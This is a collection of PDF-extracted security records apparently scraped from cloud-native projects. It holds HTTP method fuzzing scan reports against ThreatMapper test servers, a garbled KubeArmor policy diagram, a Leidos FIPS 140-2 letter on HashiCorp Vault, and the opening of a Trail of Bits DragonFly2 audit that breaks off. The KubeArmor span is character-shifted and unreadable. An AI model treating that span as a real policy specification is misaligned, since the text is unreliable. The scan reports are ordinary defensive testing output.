Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PURGE\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129:443\nRequest COPY https://137.184.10.129:443/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod COPY\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot COPY /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.COPY\nIssue Number #2\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129:443\nRequest UNLOCK https://137.184.10.129:443/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod UNLOCK\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot UNLOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. UNLOCK\nIssue Number #3\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129:443\nRequest LOCK https://137.184.10.129:443/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nmethod LOCK\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot LOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.LOCK\nIssue Number #4\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129:443\nRequest PROPFIND https://137.184.10.129:443/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PROPFIND\nResponseContent-type: text/html; charset=utf-8\n144 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PROPFIND /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. PROPFIND\nIssue Number #5\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129:443\nRequest PATCH https://137.184.10.129:443/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PATCH\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PATCH /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PATCH\nIssue Number #6Scan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129:443\nRequest TRACE https://137.184.10.129:443/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod TRACE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot TRACE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.TRACE\nIssue Number #7\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129:443\nRequest OPTIONS https://137.184.10.129:443/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #8\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129:443\nRequest HEAD https://137.184.10.129:443/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod HEAD\nResponse No contentAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #9\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129:443\nRequest DELETE https://137.184.10.129:443/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod DELETE\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot DELETE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. DELETE\nIssue Number #10\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129:443\nRequest PUT https://137.184.10.129:443/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PUT\nResponseContent-type: text/html; charset=utf-8\n139 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PUT /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PUT\nIssue Number #11\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129:443\nRequest POST https://137.184.10.129:443/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nmethod POST\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot POST /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.POST\nIssue Number #12" } ]
{ "category": "Provisioning", "file_name": "kubearmorpolicy-spec-diagram.pdf", "project_name": "KubeArmor", "subcategory": "Security & Compliance" }
[ { "data": "NFUBEBUBname: [policy name]namespace: [namespace name]TQFDTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuTFMFDUPSNBUDI-BCFMTLFZ\u001eWBMVFQSPDFTT\nNBUDI1BUITQBUI\u001b\u0001<BCTPMVUF\u0001FYFDVUBCMF\u0001QBUI>PXOFS0OMZ\u001b\u0001<USVF]GBMTF>GSPN4PVSDFQBUI\u001b\u0001<BCTPMVUF\u0001FYFDVUBCMF\u0001QBUI>\nNBUDI%JSFDUPSJFTPXOFS0OMZ\u001b\u0001<USVF]GBMTF>GSPN4PVSDFQBUI\u001b\u0001<BCTPMVUF\u0001FYFDVUBCMF\u0001QBUI>EJS\u001b\u0001<BCTPMVUF\u0001EJSFDUPSZ\u0001QBUI>SFDVSTJWF\u001b\u0001<USVF]GBMTF>\nNBUDI1BUUFSOTQBUUFSO\u001b\u0001<SFHFY\u0001QBUUFSO>PXOFS0OMZ\u001b\u0001<USVF]GBMTF>GJMF\nNBUDI1BUITQBUI\u001b\u0001<BCTPMVUF\u0001GJMF\u0001QBUI>PXOFS0OMZ\u001b\u0001<USVF]GBMTF>GSPN4PVSDFQBUI\u001b\u0001<BCTPMVUF\u0001FYFDVUBCMF\u0001QBUI>\nNBUDI%JSFDUPSJFT\nPXOFS0OMZ\u001b\u0001<USVF]GBMTF>GSPN4PVSDFQBUI\u001b\u0001<BCTPMVUF\u0001FYFDVUBCMF\u0001QBUI>EJS\u001b\u0001<BCTPMVUF\u0001EJSFDUPSZ\u0001QBUI>SFDVSTJWF\u001b\u0001<USVF]GBMTF>\nNBUDI1BUUFSOTQBUUFSO\u001b\u0001<SFHFY\u0001QBUUFSO>PXOFS0OMZ\u001b\u0001<USVF]GBMTF>SFBE0OMZ\u001b\u0001<USVF]GBMTF>SFBE0OMZ\u001b\u0001<USVF]GBMTF>SFBE0OMZ\u001b\u0001<USVF]GBMTF>\nTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFu\nTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuBDUJPO\u001b\u0001\\\"MMPX\u0001]\u0001\"VEJU\u0001]\u0001#MPDL^\nBDUJPO\u001b\u0001\\\"MMPX\u0001]\u0001\"VEJU\u0001]\u0001#MPDL^\nBDUJPO\u001b\u0001\\\"MMPX\u0001]\u0001\"VEJU\u0001]\u0001#MPDL^\nBDUJPO\u001b\u0001\\\"MMPX\u0001]\u0001\"VEJU\u0001]\u0001#MPDL^TFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuBDUJPO\u001b\u0001\\\"MMPX\u0001]\u0001\"VEJU\u0001]\u0001#MPDL^\nTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuBDUJPO\u001b\u0001\\\"MMPX\u0001]\u0001\"VEJU\u0001]\u0001#MPDL^\nTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuBDUJPO\u001b\u0001\\\"MMPX\u0001]\u0001\"VEJU\u0001]\u0001#MPDL^OFUXPSL\nNBUDI1SPUPDPMTQSPUPDPM\u001b\u0001\\\u0001UDQ\u0001]\u0001VEQ\u0001]\u0001JDNQ\u0001^GSPN4PVSDFQBUI\u001b\u0001<BCTPMVUF\u0001FYFDVUBCMF\u0001QBUI>DBQBCJMJUJFT\nNBUDI$BQBCJMJUJFTDBQBCJMJUZ\u001b\u0001\\\u0001OFU@SBX\u0001^GSPN4PVSDFQBUI\u001b\u0001<BCTPMVUF\u0001FYFDVUBCMF\u0001QBUI>TFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuBDUJPO\u001b\u0001\\\"MMPX\u0001]\u0001\"VEJU\u0001]\u0001#MPDL^TFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuBDUJPO\u001b\u0001\\\"MMPX\u0001]\u0001\"VEJU\u0001]\u0001#MPDL^TFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuBDUJPO\u001b\u0001\\\"MMPX\u0001]\u0001\"VEJU\u0001]\u0001#MPDL^TFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuBDUJPO\u001b\u0001\\\"MMPX\u0001]\u0001\"VEJU\u0001]\u0001#MPDL^TFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuBDUJPO\u001b\u0001\\\"MMPX\u0001]\u0001\"VEJU\u0001]\u0001#MPDL^TFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuBDUJPO\u001b\u0001\\\"MMPX\u0001]\u0001\"VEJU\u0001]\u0001#MPDL^\nList\nList\nListList\nList\nListListListOptional\nOptional\nOptional\nOptionalOptionalOptionalOptionalOptionalOptionalOptional\nOptionalOptionalMandatoryMandatory\nMandatory if these are not defined in each ruleKubeArmorPolicy Spec Diagram\nListListListList\nListList" } ]
{ "category": "Provisioning", "file_name": "Security Report for Security Test 1 2021-04-14 18_25_49.pdf", "project_name": "ThreatMapper", "subcategory": "Security & Compliance" }
[ { "data": "Issues report for Security Test 1\nin Project 2/Security Test Suite 1/https://164.90.157.161 TestCase\nSummary\nStarted at 2021-04-14 18:25:49\nTime taken 00:00:08.390\nTotal scans performed: 62\nIssues found: 12\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingGET 12 12\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PURGE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PURGE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PURGE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PURGE\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest COPY https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod COPY\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot COPY /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.COPY\nIssue Number #2\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest UNLOCK https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod UNLOCK\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot UNLOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. UNLOCK\nIssue Number #3\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest LOCK https://164.90.157.161/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nmethod LOCK\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot LOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.LOCK\nIssue Number #4\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PROPFIND https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PROPFIND\nResponseContent-type: text/html; charset=utf-8\n144 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PROPFIND /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. PROPFIND\nIssue Number #5\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PATCH https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PATCH\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PATCH /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PATCH\nIssue Number #6Scan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest TRACE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod TRACE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot TRACE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.TRACE\nIssue Number #7\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest OPTIONS https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #8\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest HEAD https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod HEAD\nResponse No contentAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #9\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest DELETE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod DELETE\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot DELETE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. DELETE\nIssue Number #10\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PUT https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PUT\nResponseContent-type: text/html; charset=utf-8\n139 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PUT /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PUT\nIssue Number #11\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest POST https://164.90.157.161/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nmethod POST\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot POST /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.POST\nIssue Number #12" } ]
{ "category": "Provisioning", "file_name": "Vault_Compliance_Letter_signed.pdf", "project_name": "Vault", "subcategory": "Key Management" }
[ { "data": " \n6841 Benjamin Franklin Drive / Columbia, MD 21046 / tel: 443.367.7389 / fax: 443.367.7970 leidos.com November 8 , 2017 \n \nHashiCorp \n101 2nd St #575 \nSan Francisco, CA \n94105 \n \nTo Whom It May Concern: \n \nLeidos completed its conformance review of the HashiC orp Vault v0. 9.0-beta1 (the “Product”) on November 8 , \n2017; and has found that the Product faithfully integrates the following FIPS 140 -2 approved cryptographic \nmodule: \n \n1. Luna® PCI -E Cryptographic Module and Luna® PCI -E Cryptographic Module for Luna® SA (FIPS 140 -2 \nCert. #2427) . This will be referred to as the “Integrated Cryptographic Module” throughout the \nremainder of this document. \n \nSpecifically, under the following assumptions: \n \n1. The Integrated Cryptographic Module is initialized in a manner that is compliant with its Security Policy. \n \n2. The Product is configured to use the Integrated C ryptographic Module via a ‘seal’ block specifying a seal \ntype of ‘pkcs11’ in the Product’s configuration file. \n \nLeidos’ review confirmed that: \n \n1. All cryptographic operations for encryption, decryption, message authentication code generation , \nmessage authentication code verification, and cryptographic key generation used in seal wrapping and \nunwrapping are offloaded to the Integrated Cryptographic Module . Secrets protected by seal wrapping \nare protected by encryption and message authentication codes in a fashion that is compliant to the FIPS \n140-2 guidance for both Key Storage (as per FIPS 140 -2 IG 7.16) and Key Transport (as per FIPS 140 -2 \nIG D.9). \n \n2. Secrets and paths designated as “Always Seal Wrap” in the Product are protected using the Integrated \nCryptographic Module for seal wrapping . The secrets and paths designated as “Always Seal Wrap” in the \nProduct include the following : \n \na. The Keyr ing (core/keyring) \nb. The Keyring Update Entry Path ( All files under core/upgrade/) \nc. The Master Key (core/master) \nd. The Recovery Key (core/recovery -key) \ne. Stored Barrier Keys (core/hsm/barrier -unseal -keys) \nf. Replication Token Generation Key (core/wrapping/jwtkey) \ng. Cluster Information ( core/cluster/local/info ) \nh. Replicated Cluster Information Path ( All files under core/cluster/replicated/) \ni. Replicated Cluster Information Path for Disaster Recovery ( All files under core/cluster/replicated -\ndr/) \nj. Multi-Factor Authentication TOTP Keys Path ( All files under sys/mfa/totp keys/ ) \n \n3. When a backend is configured with seal wrapping enabled with the Product, all Keys and Critical Security \nParameters written to the backend are protected using the Integrated Cryptographic Module for seal \nwrapping . The Keys and Critical Security Parameters covered by seal wrapping include: \n \n6841 Benjamin Franklin Drive / Columbia, MD 21046 / tel: 443.367.7389 / fax: 443.367.7970 leidos.com a. The CA Key (config/ca_bundle) used in the PKI secret backend \nb. The Keys (policy/) and Key Archives (archive/) used in the Transit secret backend \nc. The CA Key ( ca_private_key , config /ca_private_key ) and generated SSH RSA Keys (keys/) used \nin the SSH secret backend \nd. The Keys (key/) used in the TOTP secret backend \ne. All Storage Entries used in the KV backend \nf. AWS Access Keys (config/client) used in the AWS authentication backend \ng. LDAP Creden tials (config) used in the LDAP authentication backend \nh. Okta Credentials (config) used in the Okta authentication backend \ni. RADIUS Credentials (config) used in the RADIUS authentication backend \nj. AWS Root Credentials (config/root) used in the AWS secret backend \nk. Cassandra Credentials (config/connection) used in the Cassandra secret backend \nl. Consul Credentials (config/access) used in the Consul secret backend \nm. Database Credentials (config/*) used in the plugin -based Database secret backend \nn. MongoDB Credentials (confi g/connection) used in the MongoDB secret backend \no. MSSQL Credentials (config/connection) used in the MSSQL secret backend \np. MySQL Credentials (config/connection) used in the MySQL secret backend \nq. PostgreSQL Credentials (config/connection) used in the PostgreSQL secret backend \nr. RabbitMQ Credentials (config/connection) used in the RabbitMQ secret backend \n \n4. The Product will not operate if the Integrated Cryptographic Module is missing or altered. \n \nDetails of Leidos’ review, which consisted of source code review and operational testing, are obtainable by special \nrequest. \n \nPlease note that for this review, Leidos only examined the Product features referenced above and while the \nProduct may contain other features or functionality, Leidos did not examine these during its review and makes no \nclaims or representations regarding them. Furthermore, the Cryptographic Module Validation Program (CMVP) \nhas not independently reviewed Leidos’ analysis, testing, or results. \n \nThe intention of this letter is to provide independent op inion that the Product correctly integrates and uses \nvalidated cryptographic modules within the scope of claims indicated above. Leidos offers no warranties or \nguarantees with respect to the above described compliance review. This letter does not imply a Leidos \ncertification or product endorsement. \nPlease let us know if you have any questions. \n \nSincerely, \n \nJason Tseng \nLeidos Cryptographic and Security Testing Laboratory (CSTL) Lab Manager \n" } ]
{ "category": "Provisioning", "file_name": "Security Report for Security Test 1 2021-04-19 22_07_32.pdf", "project_name": "ThreatMapper", "subcategory": "Security & Compliance" }
[ { "data": "Issues report for Security Test 1\nin REST Project 2/https://164.90.157.161 Test Suite/https://164.90.157.161 Test Case 1\nSummary\nStarted at 2021-04-19 22:07:32\nTime taken 00:05:00.695\nTotal scans performed: 2189\nIssues found: 3\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingRequest 1 3 3\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/deepfence/v1.5/node-severity\nRequest OPTIONS https://164.90.157.161/deepfence/v1.5/node-severity HTTP/1.1\nTest Step Request 1\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/deepfence/v1.5/node-severity\nRequest HEAD https://164.90.157.161/deepfence/v1.5/node-severity HTTP/1.1\nTest Step Request 1\nModified \nParametersName Value\nmethod HEAD\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #2\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/deepfence/v1.5/node-severity\nRequest POST https://164.90.157.161/deepfence/v1.5/node-severity HTTP/1.1\nTest Step Request 1\nModified \nParametersName Value\nmethod POST\nResponseContent-type: application/json\n535 Content length: \nFull response:\n{\"data\":{\"siddharth-8vcpu-agent\":{\"containers\":{},\"kubernetes_cluster_name\n\":\"\",\"pod_id_to_ip\":{},\"pod_scope_id\":{},\"pods\":{},\"probe_id\":\"\n3c6bb1217b3b2388\",\"severity\":null},\"siddharth-8vcpu-console\":{\"containers\"\n:{},\"kubernetes_cluster_name\":\"\",\"pod_id_to_ip\":{},\"pod_scope_id\":{},\"pods\n\":{},\"probe_id\":\"35ccbb56f0e12a5d\",\"severity\":null},\"siddharth-dev-\n8vcpu-agent3\":{\"containers\":{},\"kubernetes_cluster_name\":\"\",\"pod_id_to_ip\"\n:{},\"pod_scope_id\":{},\"pods\":{},\"probe_id\":\"7726d7c69133fbc2\",\"severity\":\nnull}},\"error\":null,\"success\":true}\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.POST\nIssue Number #3" } ]
{ "category": "Provisioning", "file_name": "dragonfly-comprehensive-report-2023.pdf", "project_name": "Dragonfly", "subcategory": "Container Registry" }
[ { "data": " DragonFl y2 \n Security Assessment \n September 14, 2023 \n Prepared for: \n Gaius Qi \n DragonFly2 \n Organized by the Open Source Technology Improvement Fund, Inc. \n Prepared by: Paweł Płatek and Sam Alws \n About Trail of Bits \n Founded in 2012 and headquartered in New York, Trail of Bits provides technical security \n assessment and advisory services to some of the world’s most targeted organizations. We \n combine high- end security research with a real -world attacker mentality to reduce risk and \n fortify code. With 100+ employees around the globe, we’ve helped secure critical software \n elem ents that support billions of end users, including Kubernetes and the Linux kernel. \n We maintain an exhaustive list of publications at https://github.com/trailofbits/publications , \n with links to papers, presentations, public audit reports, and podcast appearances. \n In recent years, Trail of Bits consultants have showcased cutting-edge research through \n presentations at CanSecWest, HCSS, Devcon, Empire Hacking, GrrCon, LangSec, NorthSec, \n the O’Reilly Security Conference, PyCon, REcon, Security BSides, and SummerCon. \n We specialize in software testing and code review projects, supporting client organizations \n in the technology, defense, and finance industries, as well as government entities. Notable \n clients include HashiCorp, Google, Microsoft, Western Digital, and Zoom. \n Trail of Bits also operates a center of excellence with regard to blockchain security. Notable \n projects include audits of Algorand, Bitcoin SV, Chainlink, Compound, Ethereum 2.0, \n MakerDAO, Matic, Uniswap, Web3, and Zcash. \n To keep up to date with our latest news and announcements, please follow @trailofbits on \n Twitter and explore our public repositories at https://github.com/trailofbits . To engage us \n directly, visit our “Contact” page at https://www.trailofbits.com/contact , or email us at \n info@trailofbits.com . \n Trail of Bits, Inc. \n 228 Park Ave S #80688 \n New York, 